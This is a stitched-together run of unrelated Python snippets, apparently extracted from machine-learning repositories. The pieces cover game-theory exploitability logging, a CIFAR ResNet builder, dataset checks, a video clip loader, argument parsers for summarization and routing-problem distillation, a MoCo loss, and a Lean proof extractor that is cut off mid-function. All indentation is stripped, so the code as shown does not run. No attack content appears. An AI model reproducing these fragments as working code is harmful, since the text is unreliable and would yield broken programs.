logger.info(f'{n_policies} policies, {exploitability_this_gen} approx exploitability')
latest_policy_steps = sum((policy_spec_added_this_gen[p].metadata['timesteps_training_br'] for p in range(2)))
latest_policy_episodes = sum((policy_spec_added_this_gen[p].metadata['episodes_training_br'] for p in range(2)))
if (latest_policy_index > 0):
total_steps_this_generation = (latest_policy_steps + self._total_steps_per_generation[(latest_policy_index - 1)])
total_episodes_this_generation = (latest_policy_episodes + self._total_episodes_per_generation[(latest_policy_index - 1)])
else:
total_steps_this_generation = latest_policy_steps
total_episodes_this_generation = latest_policy_episodes
self._exploitability_per_generation.append(exploitability_this_gen)
self._total_steps_per_generation.append(total_steps_this_generation)
self._total_episodes_per_generation.append(total_episodes_this_generation)
self._num_policies_per_generation.append(n_policies)
self._payoff_table_checkpoint_nums.append(current_checkpoint_num)
self._payoff_table_checkpoint_paths.append(self.get_latest_numbered_payoff_table_checkpoint_path())
self._policy_nums_checkpoint_paths.append(self.get_latest_numbered_policy_nums_path())
stats_out = {'num_policies': self._num_policies_per_generation, 'approx_exploitability': self._exploitability_per_generation, 'timesteps': self._total_steps_per_generation, 'episodes': self._total_episodes_per_generation, 'payoff_table_checkpoint_num': self._payoff_table_checkpoint_nums, 'payoff_table_checkpoint_path': self._payoff_table_checkpoint_paths, 'policy_nums_checkpoint_path': self._policy_nums_checkpoint_paths}
with open(self._exploitability_stats_save_path, '+w') as json_file:
json.dump(stats_out, json_file)
logger.info(colored(f'(Graph this in a notebook) Saved approx exploitability stats to {self._exploitability_stats_save_path}', 'green')) |
def get_diapreresnet_cifar(num_classes, blocks, bottleneck, model_name=None, pretrained=False, root=os.path.join('~', '.torch', 'models'), **kwargs):
assert (num_classes in [10, 100])
if bottleneck:
assert (((blocks - 2) % 9) == 0)
layers = ([((blocks - 2) // 9)] * 3)
else:
assert (((blocks - 2) % 6) == 0)
layers = ([((blocks - 2) // 6)] * 3)
channels_per_layers = [16, 32, 64]
init_block_channels = 16
channels = [([ci] * li) for (ci, li) in zip(channels_per_layers, layers)]
if bottleneck:
channels = [[(cij * 4) for cij in ci] for ci in channels]
net = CIFARDIAPreResNet(channels=channels, init_block_channels=init_block_channels, bottleneck=bottleneck, num_classes=num_classes, **kwargs)
if pretrained:
if ((model_name is None) or (not model_name)):
raise ValueError('Parameter `model_name` should be properly initialized for loading pretrained model.')
from .model_store import download_model
download_model(net=net, model_name=model_name, local_model_store_dir_path=root)
return net |
def check_has_downloaded():
global iPER_images_dir, iPER_train_txt, iPER_val_txt
has_download = (os.path.exists(iPER_train_txt) and os.path.exists(iPER_val_txt))
if has_download:
train_vid_names = get_video_dirs(iPER_train_txt)
val_vid_names = get_video_dirs(iPER_val_txt)
all_vid_names = (train_vid_names + val_vid_names)
for vid_name in all_vid_names:
vid_path = os.path.join(iPER_images_dir, vid_name)
print(vid_path)
if ((not os.path.exists(vid_path)) or (len(os.listdir(vid_path)) == 0)):
has_download = False
break
return has_download |
class TFRobertaPreLayerNormForSequenceClassification(metaclass=DummyObject):
_backends = ['tf']
def __init__(self, *args, **kwargs):
requires_backends(self, ['tf']) |
class DumbSpotVideo(Video):
def __init__(self, video_path: (str | Path), fps: int, num_frames: int, num_decode: int=1, min_clip_duration: float=0, **kwargs) -> None:
self._fps = fps
self._num_frames = num_frames
self._video_path = video_path
self._name = (Path(Path(self._video_path).name) / Path(self._half_path.name))
self._num_decode = num_decode
self._min_clip_duration = min_clip_duration
def name(self) -> str:
return self._name
def get_frame_indices(self, start_frame: float, end_frame: float) -> tuple[(torch.Tensor, torch.Tensor)]:
if ((start_frame < 0) or (start_frame >= self._num_frames) or (end_frame >= self._num_frames)):
logger.warning(f'No frames found within {start_frame} and {end_frame} frames. Video startsat frame 0 and ends at {self._num_frames}.')
return None
video_frame_indices = torch.arange(start_frame, (end_frame + 1))
if ((self._min_clip_duration > 0) and (len(video_frame_indices) < self._min_clip_duration)):
num_lacking_frames = ((self._min_clip_duration * self._fps) - len(video_frame_indices))
if (start_frame == 0):
video_frame_indices = torch.cat([torch.zeros(num_lacking_frames, dtype=video_frame_indices.dtype), video_frame_indices])
else:
video_frame_indices = torch.cat([video_frame_indices, torch.tensor([video_frame_indices[(- 1)] for _ in range(num_lacking_frames)], dtype=video_frame_indices.dtype)])
return video_frame_indices
def get_clip(self, start_frame: int, end_frame: int) -> dict[(str, ((torch.Tensor | None) | list[torch.Tensor]))]:
frame_indices = self.get_frame_indices(start_frame, end_frame)
videos = torch.randn((3, frame_indices.shape[0], 224, 224), dtype=torch.float32)
if (self._num_decode > 1):
videos = [videos for _ in range(self._num_decode)]
return {'video': videos, 'clip_start': frame_indices[0].item(), 'clip_end': frame_indices[(- 1)].item(), 'frame_indices': frame_indices} |
def parse_args():
parser = argparse.ArgumentParser(description='Finetune a transformers model on a summarization task')
parser.add_argument('--dataset_name', type=str, default=None, help='The name of the dataset to use (via the datasets library).')
parser.add_argument('--dataset_config_name', type=str, default=None, help='The configuration name of the dataset to use (via the datasets library).')
parser.add_argument('--train_file', type=str, default=None, help='A csv or a json file containing the training data.')
parser.add_argument('--validation_file', type=str, default=None, help='A csv or a json file containing the validation data.')
parser.add_argument('--ignore_pad_token_for_loss', type=bool, default=True, help='Whether to ignore the tokens corresponding to padded labels in the loss computation or not.')
parser.add_argument('--max_source_length', type=int, default=1024, help='The maximum total input sequence length after tokenization.Sequences longer than this will be truncated, sequences shorter will be padded.')
parser.add_argument('--source_prefix', type=str, default=None, help='A prefix to add before every source text (useful for T5 models).')
parser.add_argument('--preprocessing_num_workers', type=int, default=None, help='The number of processes to use for the preprocessing.')
parser.add_argument('--overwrite_cache', action='store_true', help='Overwrite the cached training and evaluation sets')
parser.add_argument('--max_target_length', type=int, default=128, help='The maximum total sequence length for target text after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded.during ``evaluate`` and ``predict``.')
parser.add_argument('--val_max_target_length', type=int, default=None, help='The maximum total sequence length for validation target text after tokenization.Sequences longer than this will be truncated, sequences shorter will be padded. Will default to `max_target_length`.This argument is also used to override the ``max_length`` param of ``model.generate``, which is used during ``evaluate`` and ``predict``.')
parser.add_argument('--num_beams', type=int, default=None, help='Number of beams to use for evaluation. This argument will be passed to ``model.generate``, which is used during ``evaluate`` and ``predict``.')
parser.add_argument('--pad_to_max_length', action='store_true', help='If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.')
parser.add_argument('--model_name_or_path', type=str, help='Path to pretrained model or model identifier from huggingface.co/models.', required=False)
parser.add_argument('--config_name', type=str, default=None, help='Pretrained config name or path if not the same as model_name')
parser.add_argument('--tokenizer_name', type=str, default=None, help='Pretrained tokenizer name or path if not the same as model_name')
parser.add_argument('--text_column', type=str, default=None, help='The name of the column in the datasets containing the full texts (for summarization).')
parser.add_argument('--summary_column', type=str, default=None, help='The name of the column in the datasets containing the summaries (for summarization).')
parser.add_argument('--use_slow_tokenizer', action='store_true', help='If passed, will use a slow tokenizer (not backed by the Tokenizers library).')
parser.add_argument('--per_device_train_batch_size', type=int, default=8, help='Batch size (per device) for the training dataloader.')
parser.add_argument('--per_device_eval_batch_size', type=int, default=8, help='Batch size (per device) for the evaluation dataloader.')
parser.add_argument('--learning_rate', type=float, default=5e-05, help='Initial learning rate (after the potential warmup period) to use.')
parser.add_argument('--weight_decay', type=float, default=0.0, help='Weight decay to use.')
parser.add_argument('--num_train_epochs', type=int, default=3, help='Total number of training epochs to perform.')
parser.add_argument('--max_train_steps', type=int, default=None, help='Total number of training steps to perform. If provided, overrides num_train_epochs.')
parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help='Number of updates steps to accumulate before performing a backward/update pass.')
parser.add_argument('--lr_scheduler_type', type=SchedulerType, default='linear', help='The scheduler type to use.', choices=['linear', 'cosine', 'cosine_with_restarts', 'polynomial', 'constant', 'constant_with_warmup'])
parser.add_argument('--num_warmup_steps', type=int, default=0, help='Number of steps for the warmup in the lr scheduler.')
parser.add_argument('--output_dir', type=str, default=None, help='Where to store the final model.')
parser.add_argument('--seed', type=int, default=None, help='A seed for reproducible training.')
parser.add_argument('--model_type', type=str, default=None, help='Model type to use if training from scratch.', choices=MODEL_TYPES)
parser.add_argument('--push_to_hub', action='store_true', help='Whether or not to push the model to the Hub.')
parser.add_argument('--hub_model_id', type=str, help='The name of the repository to keep in sync with the local `output_dir`.')
parser.add_argument('--hub_token', type=str, help='The token to use to push to the Model Hub.')
parser.add_argument('--checkpointing_steps', type=str, default=None, help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.")
parser.add_argument('--resume_from_checkpoint', type=str, default=None, help='If the training should continue from a checkpoint folder.')
parser.add_argument('--with_tracking', action='store_true', help='Whether to enable experiment trackers for logging.')
parser.add_argument('--report_to', type=str, default='all', help='The integration to report the results and logs to. Supported platforms are `"tensorboard"`, `"wandb"`, `"comet_ml"` and `"clearml"`. Use `"all"` (default) to report to all integrations.Only applicable when `--with_tracking` is passed.')
args = parser.parse_args()
if ((args.dataset_name is None) and (args.train_file is None) and (args.validation_file is None)):
raise ValueError('Need either a dataset name or a training/validation file.')
else:
if (args.train_file is not None):
extension = args.train_file.split('.')[(- 1)]
assert (extension in ['csv', 'json']), '`train_file` should be a csv or a json file.'
if (args.validation_file is not None):
extension = args.validation_file.split('.')[(- 1)]
assert (extension in ['csv', 'json']), '`validation_file` should be a csv or a json file.'
if args.push_to_hub:
assert (args.output_dir is not None), 'Need an `output_dir` to create a repo when `--push_to_hub` is passed.'
return args |
def maxpool(x, dim=(- 1), keepdim=False):
(out, _) = x.max(dim=dim, keepdim=keepdim)
return out |
def compute_moco_loss(q: Tensor, k: Tensor, k_global: Tensor, use_keys: bool, queue: Tensor, temp: float=0.2, rank: int=0) -> Tensor:
batch_size = q.shape[0]
if use_keys:
labels = (torch.arange(batch_size, dtype=torch.long, device=q.device) + (batch_size * rank))
sim_k = torch.einsum('nc,mc->nm', [q, k_global])
if (queue is not None):
sim_queue = torch.einsum('nc,ck->nk', [q, queue])
sim = torch.cat([sim_k, sim_queue], dim=1)
else:
sim = sim_k
else:
sim_k = torch.einsum('nc,nc->n', [q, k]).unsqueeze((- 1))
sim_queue = torch.einsum('nc,ck->nk', [q, queue])
sim = torch.cat([sim_k, sim_queue], dim=1)
labels = torch.zeros(batch_size, dtype=torch.long, device=q.device)
logits = (sim / temp)
loss = nn.functional.cross_entropy(logits, labels)
return loss |
def get_options(args=None):
parser = argparse.ArgumentParser(description='Adaptive Multi-Distribution Knowledge Distillation (AMDKD) scheme for AM')
parser.add_argument('--problem', default='cvrp', help="The problem to solve, or 'tsp'")
parser.add_argument('--graph_size', type=int, default=20, help='The size of the problem graph')
parser.add_argument('--batch_size', type=int, default=512, help='Number of instances per batch during training')
parser.add_argument('--epoch_size', type=int, default=128000, help='Number of instances per epoch during training')
parser.add_argument('--val_size', type=int, default=10000, help='Number of instances used for reporting validation performance')
parser.add_argument('--val_dataset', type=str, default=None, help='Dataset file to use for validation')
parser.add_argument('--test_type', type=str, default='greedy', help='test type')
parser.add_argument('--model', default='attention', help="Model, 'attention' (default) or 'pointer'")
parser.add_argument('--embedding_dim', type=int, default=128, help='Dimension of input embedding')
parser.add_argument('--hidden_dim', type=int, default=128, help='Dimension of hidden layers in Enc/Dec')
parser.add_argument('--n_encode_layers', type=int, default=3, help='Number of layers in the encoder/critic network')
parser.add_argument('--tanh_clipping', type=float, default=10.0, help='Clip the parameters to within +- this value using tanh.Set to 0 to not perform any clipping.')
parser.add_argument('--normalization', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
parser.add_argument('--distillation', action='store_true', default=True, help='whether to use knowledge distillation')
parser.add_argument('--adaptive_prob', action='store_true', default=True, help='randomly choose teacher considering the gap of each distribution')
parser.add_argument('--random_adaptive_prob', type=float, default=0, help='randomly choose whether considering the gap or not')
parser.add_argument('--adaptive_prob_type', type=str, default='softmax', help='the way to calculate the adaptive prob, softmax or sum')
parser.add_argument('--start_adaptive_epoch', type=int, default=500)
parser.add_argument('--student_embedding_dim', type=int, default=64, help='Dimension of input embedding in student net')
parser.add_argument('--student_hidden_dim', type=int, default=64, help='Dimension of hidden layers in Enc/Dec in student net')
parser.add_argument('--student_n_encode_layers', type=int, default=3, help='Number of layers in the encoder/critic network in student net')
parser.add_argument('--student_normalization', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
parser.add_argument('--student_feed_forward_hidden', default=512, type=int, help='FFN dim in student graph encoder(Transformer block)')
parser.add_argument('--student_load', action='store_true', default=False, help='whether to load student model')
parser.add_argument('--student_load_path', type=str, help='load path of the student model')
parser.add_argument('--n_cluster', type=int, default=3, help='n_cluster for cluster distribution')
parser.add_argument('--n_cluster_mix', type=int, default=1, help='n_cluster for mixed cluster distribution')
parser.add_argument('--generate_mix_data', action='store_true', default=False, help='whether to generate mix data')
parser.add_argument('--distill_temperature', type=int, default=1)
parser.add_argument('--rl_alpha', type=float, default=0.5, help='weight for RL loss (task loss)')
parser.add_argument('--distill_alpha', type=float, default=0.5, help='weight for KLD loss (distill loss)')
parser.add_argument('--twist_kldloss', action='store_true', default=False)
parser.add_argument('--meaningful_KLD', action='store_true', default=False)
parser.add_argument('--router', type=str, default='student', help='Teacher or student acts as the router')
parser.add_argument('--hinton_t2', action='store_true', default=False, help='soft target loss * temperature^2')
parser.add_argument('--distill_distribution', action='store_true', default=False, help='AMDKD')
parser.add_argument('--load_path_uniform', type=str, help='teacher model under uniform distribution')
parser.add_argument('--load_path_cluster', type=str, help='teacher model under cluster distribution')
parser.add_argument('--load_path_mixed', type=str, help='teacher model under mixed distribution')
parser.add_argument('--multi_distribution_baseline', action='store_true', default=False, help='whether to use mix data during baseline evaluation')
parser.add_argument('--multi_teacher', action='store_true', default=False, help='whether to use the multi-teacher loss[1]')
parser.add_argument('--multi_test', action='store_true', default=False, help='whether to test in different distributions')
parser.add_argument('--normalization_uniform', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
parser.add_argument('--normalization_cluster', default='instance', help="Normalization type, 'batch' (default) or 'instance'")
parser.add_argument('--normalization_mixed', default='batch', help="Normalization type, 'batch' (default) or 'instance'")
parser.add_argument('--val_dataset_uniform', type=str, default=None, help='Dataset file to use for validation')
parser.add_argument('--val_dataset_cluster', type=str, default=None, help='Dataset file to use for validation')
parser.add_argument('--val_dataset_mixed', type=str, default=None, help='Dataset file to use for validation')
parser.add_argument('--lr_model', type=float, default=0.0001, help='Set the learning rate for the actor network(1e-4 for basic AM)')
parser.add_argument('--lr_critic', type=float, default=0.0001, help='Set the learning rate for the critic network')
parser.add_argument('--lr_decay', type=float, default=1.0, help='Learning rate decay per epoch')
parser.add_argument('--eval_only', action='store_true', default=False, help='Set this value to only evaluate model')
parser.add_argument('--n_epochs', type=int, default=10000, help='The number of epochs to train')
parser.add_argument('--seed', type=int, default=1234, help='Random seed to use')
parser.add_argument('--max_grad_norm', type=float, default=1.0, help='Maximum L2 norm for gradient clipping, default 1.0 (0 to disable clipping)')
parser.add_argument('--no_cuda', action='store_true', help='Disable CUDA')
parser.add_argument('--exp_beta', type=float, default=0.8, help='Exponential moving average baseline decay (default 0.8)')
parser.add_argument('--baseline', default='rollout', help="Baseline to use: 'rollout', 'critic' or 'exponential'. Defaults to no baseline.")
parser.add_argument('--bl_alpha', type=float, default=0.05, help='Significance in the t-test for updating rollout baseline')
parser.add_argument('--bl_warmup_epochs', type=int, default=None, help='Number of epochs to warmup the baseline, default None means 1 for rollout (exponential used for warmup phase), 0 otherwise. Can only be used with rollout baseline.')
parser.add_argument('--eval_batch_size', type=int, default=1024, help='Batch size to use during (baseline) evaluation')
parser.add_argument('--checkpoint_encoder', action='store_true', help='Set to decrease memory usage by checkpointing encoder')
parser.add_argument('--shrink_size', type=int, default=None, help='Shrink the batch size if at least this many instances in the batch are finished to save memory (default None means no shrinking)')
parser.add_argument('--data_distribution', type=str, default='uniform', help='Data distribution to use during training, defaults and options depend on problem.')
parser.add_argument('--log_step', type=int, default=50, help='Log info every log_step steps')
parser.add_argument('--log_dir', default='logs', help='Directory to write TensorBoard information to')
parser.add_argument('--run_name', default='run_AMDKD', help='Name to identify the run')
parser.add_argument('--output_dir', default='outputs', help='Directory to write output models to')
parser.add_argument('--epoch_start', type=int, default=0, help='Start at epoch # (relevant for learning rate decay)')
parser.add_argument('--checkpoint_epochs', type=int, default=1, help='Save checkpoint every n epochs (default 1), 0 to save no checkpoints')
parser.add_argument('--is_load', action='store_true', default=False, help='whether to load model parameters and optimizer state')
parser.add_argument('--is_load_multi', action='store_true', default=False)
parser.add_argument('--load_path', type=str, help='Path to load model parameters and optimizer state from')
parser.add_argument('--resume', help='Resume from previous checkpoint file')
parser.add_argument('--no_tensorboard', action='store_true', help='Disable logging TensorBoard files')
parser.add_argument('--no_progress_bar', action='store_true', help='Disable progress bar')
parser.add_argument('--all_cuda_visible', action='store_true', help='Whether to use all available cuda')
parser.add_argument('--CUDA_VISIBLE_ID', default='0', help='Make specific id of cuda visible and use them instead of all available cuda')
opts = parser.parse_args(args)
if (not opts.all_cuda_visible):
os.environ['CUDA_VISIBLE_DEVICES'] = opts.CUDA_VISIBLE_ID
opts.use_cuda = (torch.cuda.is_available() and (not opts.no_cuda))
opts.best = 0
opts.save_best = False
if opts.distill_distribution:
opts.multi_test = True
if opts.multi_test:
if (opts.problem == 'tsp'):
opts.val_dataset_uniform = 'data/tsp/tsp_uniform{}_1000_seed1234.pkl'.format(opts.graph_size)
opts.val_dataset_cluster = 'data/tsp/tsp_cluster{}_1000_seed1234.pkl'.format(opts.graph_size)
opts.val_dataset_mixed = 'data/tsp/tsp_mixed{}_1000_seed1234.pkl'.format(opts.graph_size)
elif (opts.problem == 'cvrp'):
opts.val_dataset_uniform = 'data/vrp/vrp_uniform{}_1000_seed1234.pkl'.format(opts.graph_size)
opts.val_dataset_cluster = 'data/vrp/vrp_cluster{}_1000_seed1234.pkl'.format(opts.graph_size)
opts.val_dataset_mixed = 'data/vrp/vrp_mixed{}_1000_seed1234.pkl'.format(opts.graph_size)
if (opts.problem == 'tsp'):
opts.normalization_uniform = 'instance'
opts.normalization_mixed = 'instance'
opts.student_normalization = 'instance'
opts.normalization = 'instance'
if opts.adaptive_prob:
if (opts.problem == 'tsp'):
LKH3_optimal = {20: [3.84485, 1.824836, 3.], 50: [5.686744, 2.666433, 4.912134], 100: [7.753418, 3.667576, 6.729566]}
elif (opts.problem == 'cvrp'):
LKH3_optimal = {20: [6.156523, 3., 5.439149], 50: [10.417558, 5.155511, 9.354149], 100: [15.740834, 7.909336, 14.294179]}
opts.LKH3_optimal = LKH3_optimal[opts.graph_size]
opts.run_name = '{}_{}'.format(opts.run_name, time.strftime('%Y%m%dT%H%M%S'))
opts.save_dir = os.path.join(opts.output_dir, '{}_{}'.format(opts.problem, opts.graph_size), opts.run_name)
if (opts.bl_warmup_epochs is None):
opts.bl_warmup_epochs = (1 if (opts.baseline == 'rollout') else 0)
if opts.distillation:
if opts.distill_distribution:
if (not opts.load_path_uniform):
opts.load_path_uniform = 'teacher/{}{}/{}{}-uniform-epoch-99.pt'.format(opts.problem, opts.graph_size, opts.problem, opts.graph_size)
print('Using given Uniform teacher')
if (not opts.load_path_cluster):
opts.load_path_cluster = 'teacher/{}{}/{}{}-cluster-epoch-99.pt'.format(opts.problem, opts.graph_size, opts.problem, opts.graph_size)
print('Using given Cluster teacher')
if (not opts.load_path_mixed):
opts.load_path_mixed = 'teacher/{}{}/{}{}-mixed-epoch-99.pt'.format(opts.problem, opts.graph_size, opts.problem, opts.graph_size)
print('Using given Mixed teacher')
opts.load_path_multi = {'uniform': opts.load_path_uniform, 'cluster': opts.load_path_cluster, 'mixed': opts.load_path_mixed}
else:
assert (opts.load_path is not None), 'Knowledge Distillation for a single model must load a teacher model!'
assert ((opts.bl_warmup_epochs == 0) or (opts.baseline == 'rollout'))
assert ((opts.epoch_size % opts.batch_size) == 0), 'Epoch size must be integer multiple of batch size!'
return opts |
def main(train_set_dir, val_set_dir):
if ((not os.path.exists(train_set_dir)) and os.path.exists(val_set_dir)):
print('ERROR: Target Dir Does Not Exist')
return
train_csv_list = os.listdir((os.getcwd() + train_set_dir))
val_csv_list = os.listdir((os.getcwd() + val_set_dir))
i = 0
for train in train_csv_list:
rearrange(((train_set_dir + os.sep) + train), mode='train')
i += 1
print('\rProgress: {:>4}/{:>4}'.format(i, len(train_csv_list)), end='')
i = 0
for val in val_csv_list:
rearrange(((val_set_dir + os.sep) + val), mode='validation')
i += 1
print('\rProgress: {:>4}/{:>4}'.format(i, len(val_csv_list)), end='') |
class Network(nn.Module):
def __init__(self, network_config):
super(Network, self).__init__()
self.network_config = network_config
def forward(self, input):
raise NotImplementedError
def step(self):
pass
def re_init(self):
pass |
class ProofExtractor():
lean_file: LeanFile
relative_file_path: Path
tactic_instance_data: List[Dict[(str, Any)]]
tactic_position_data: List[Dict[(str, Any)]]
tactic_pos_data: List[Dict[(str, Any)]]
tactic_data: Dict[(str, Dict[(str, Any)])]
tactic_pos_trace_keys: Dict[(Tuple[(str, int, int, int)], str)]
parameter_positions: Dict[(Tuple[(int, int)], List[Tuple[(int, int)]])]
tactic_block_positions: Set[Tuple[(int, int)]]
tactics_to_process: List[str]
processed_tactics: Set[str]
proof_trees: List[Dict[(str, Any)]]
proof_table: List[Dict[(str, Any)]]
tactic_table: List[Dict[(str, Any)]]
arg_table: List[Dict[(str, Any)]]
def __init__(self, lean_file: LeanFile, relative_file_path: str, tactic_instance_data: List[Dict[(str, Any)]], tactic_params_pos_data: List[Dict[(str, Any)]]):
self.lean_file = lean_file
self.relative_file_path = relative_file_path
self.tactic_instance_data = tactic_instance_data
self.tactic_params_pos_data = tactic_params_pos_data
self.tactic_pos_data = []
self.tactic_data = {}
self.proof_trees = []
self.proof_table = []
self.tactic_table = []
self.arg_table = []
def remove_index_from_key(key: str) -> str:
return ':'.join(key.split(':')[:3])
def build_tactic_pos_data(self) -> None:
tactic_pos_data = {}
for tactic_instance in self.tactic_instance_data:
tactic_pos = {}
tactic_pos['filename'] = tactic_instance['filename']
tactic_pos['key'] = self.remove_index_from_key(tactic_instance['key'])
tactic_pos['trace_pos_line'] = tactic_instance['trace_pos_line']
tactic_pos['trace_pos_column'] = tactic_instance['trace_pos_column']
tactic_pos['line'] = tactic_instance['line']
tactic_pos['column'] = tactic_instance['column']
tactic_pos['depth'] = tactic_instance['depth']
tactic_pos['proof'] = self.remove_index_from_key(tactic_instance['proof'])
tactic_pos['block'] = self.remove_index_from_key(tactic_instance['block'])
tactic_pos['parent'] = self.remove_index_from_key(tactic_instance['parent'])
tactic_pos_data[(tactic_pos['filename'], tactic_pos['key'])] = tactic_pos
self.tactic_pos_data = list(tactic_pos_data.values())
def build_tactic_data(self) -> None:
self.tactic_data = {}
for tac in sorted(self.tactic_pos_data, key=(lambda tac: tac['depth'])):
if ((tac['trace_pos_line'], tac['trace_pos_column']) != (tac['line'], tac['column'])):
continue
data = {}
data['filename'] = tac['filename']
data['key'] = tac['key']
data['parent'] = tac['parent']
data['depth'] = tac['depth']
symbol = self.lean_file.get_token((tac['line'] - 1), (tac['column'] - 1)).string
if (symbol == ';'):
data['type'] = 'semicolon'
data['line'] = tac['line']
data['column'] = tac['column']
data['semicolon_reverse_depth'] = None
data['preceeding_symbol'] = None
data['preceeding_line'] = None
data['preceeding_column'] = None
else:
if (symbol == '}'):
left = self.lean_file.find_left_bracket(['{'], ['}'], (tac['line'] - 1), (tac['column'] - 1))
data['type'] = 'begin_end'
data['line'] = (left.line + 1)
data['column'] = (left.column + 1)
elif (symbol == 'end'):
left = self.lean_file.find_left_bracket(['begin', 'match'], ['end'], (tac['line'] - 1), (tac['column'] - 1))
data['type'] = 'begin_end'
data['line'] = (left.line + 1)
data['column'] = (left.column + 1)
else:
data['type'] = 'named'
data['line'] = tac['line']
data['column'] = tac['column']
preceeding_token = self.lean_file.get_prev_matching_pattern((data['line'] - 1), (data['column'] - 1), [TokenType.SYMBOL, TokenType.ALPHANUMERIC])
data['preceeding_symbol'] = preceeding_token.string
data['preceeding_line'] = (preceeding_token.line + 1)
data['preceeding_column'] = (preceeding_token.column + 1)
data['semicolon_reverse_depth'] = 0
current_data = data
rev_depth = 0
while (current_data['parent'] in self.tactic_data):
parent = self.tactic_data[current_data['parent']]
if (parent['type'] != 'semicolon'):
break
if ((data['line'], data['column']) > (parent['line'], parent['column'])):
break
rev_depth += 1
current_data = parent
current_data['line'] = data['line']
current_data['column'] = data['column']
current_data['semicolon_reverse_depth'] = rev_depth
current_data['preceeding_symbol'] = data['preceeding_symbol']
current_data['preceeding_line'] = data['preceeding_line']
current_data['preceeding_column'] = data['preceeding_column']
self.tactic_data[data['key']] = data
def build_parser_hints(self) -> None:
tactic_data_list = sorted(self.tactic_data.values(), key=(lambda tac: (tac['line'], tac['column'])))
self.tactic_params_pos_data.sort(key=(lambda param: (param['line'], param['column'])))
self.parameter_positions = collections.defaultdict(list)
for param in self.tactic_params_pos_data:
self.parameter_positions[((param['line'] - 1), (param['column'] - 1))].append(((param['end_line'] - 1), (param['end_column'] - 1)))
self.tactic_block_positions = set()
self.tactics_to_process = []
self.tactic_pos_trace_keys = {}
for tac in tactic_data_list:
if (tac['preceeding_symbol'] in ('by', 'begin', '{')):
self.tactic_block_positions.add(((tac['preceeding_line'] - 1), (tac['preceeding_column'] - 1)))
self.tactics_to_process.append(tac['key'])
self.tactic_pos_trace_keys[(tac['filename'], tac['line'], tac['column'], tac['semicolon_reverse_depth'])] = tac['key']
self.processed_tactics = set()
def extract_ast(self, ast: AST.ASTData, proof_key: str, parent_key: str, parent_type: str, index: int) -> Dict[(str, Any)]:
node = {}
node['key'] = None
row = {}
row['key'] = None
row['filename'] = self.relative_file_path
row['start_line'] = (ast.line + 1)
row['start_column'] = (ast.column + 1)
row['end_line'] = (ast.end_line + 1)
row['end_column'] = (ast.end_column + 1)
row['code_string'] = self.lean_file.slice_string(ast.line, ast.column, ast.end_line, ast.end_column, clean=True)
row['class'] = None
row['parent_key'] = parent_key
row['parent_type'] = parent_type
row['index'] = index
row['line'] = (ast.line + 1)
row['column'] = (ast.column + 1)
key = f"{row['filename']}:{row['line']}:{row['column']}"
infix_key = 0
if isinstance(ast, AST.ByProof):
node['node_type'] = 'proof'
node['node_subtype'] = 'by'
node['tactic'] = self.extract_ast(ast.tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
row['first_tactic_key'] = node['tactic']['key']
elif isinstance(ast, AST.BeginProof):
node['node_type'] = 'proof'
node['node_subtype'] = 'begin'
node['tactics'] = []
for (i, tactic) in enumerate(ast.tactics):
node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
row['first_tactic_key'] = node['tactics'][0]['key']
elif isinstance(ast, AST.BracketProof):
node['node_type'] = 'proof'
node['node_subtype'] = 'bracket'
node['tactics'] = []
for (i, tactic) in enumerate(ast.tactics):
node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
row['first_tactic_key'] = node['tactics'][0]['key']
elif isinstance(ast, AST.SemicolonListTactic):
node['node_type'] = 'tactic'
node['node_subtype'] = 'semicolon_list'
row['line'] = (ast.semicolon_line + 1)
row['column'] = (ast.semicolon_column + 1)
key = f"{row['filename']}:{row['line']}:{row['column']}"
infix_key = ast.semicolon_count
node['tactic1'] = self.extract_ast(ast.tactic1, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
node['tactics2'] = []
for (i, tactic) in enumerate(ast.tactic_list):
node['tactics2'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=(i + 1)))
elif isinstance(ast, AST.SemicolonTactic):
node['node_type'] = 'tactic'
node['node_subtype'] = 'semicolon'
row['line'] = (ast.semicolon_line + 1)
row['column'] = (ast.semicolon_column + 1)
key = f"{row['filename']}:{row['line']}:{row['column']}"
infix_key = ast.semicolon_count
node['tactic1'] = self.extract_ast(ast.tactic1, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
node['tactic2'] = self.extract_ast(ast.tactic2, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=1)
elif isinstance(ast, AST.AlternativeTactic):
node['node_type'] = 'tactic'
node['node_subtype'] = 'alternative'
row['line'] = (ast.alternative_line + 1)
row['column'] = (ast.alternative_column + 1)
key = f"{row['filename']}:{row['line']}:{row['column']}"
infix_key = (- 1)
node['tactic1'] = self.extract_ast(ast.tactic1, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=0)
node['tactic2'] = self.extract_ast(ast.tactic2, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=1)
elif isinstance(ast, AST.Solve1Tactic):
node['node_type'] = 'tactic'
node['node_subtype'] = 'solve1'
node['tactics'] = []
for (i, tactic) in enumerate(ast.tactics):
node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
elif isinstance(ast, AST.NamedTactic):
node['node_type'] = 'tactic'
node['node_subtype'] = 'named'
node['args'] = []
for (i, arg) in enumerate(ast.args):
node['args'].append(self.extract_ast(arg, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
elif isinstance(ast, AST.ITactic):
node['node_type'] = 'tactic'
node['node_subtype'] = 'itactic'
node['tactics'] = []
for (i, tactic) in enumerate(ast.tactics):
node['tactics'].append(self.extract_ast(tactic, proof_key=proof_key, parent_key=key, parent_type=node['node_type'], index=i))
elif isinstance(ast, AST.CalcTactic):
node['node_type'] = 'tactic'
node['node_subtype'] = 'calc'
elif isinstance(ast, AST.ITacticTacticParam):
node['node_type'] = 'tactic_arg'
node['node_subtype'] = 'itactic'
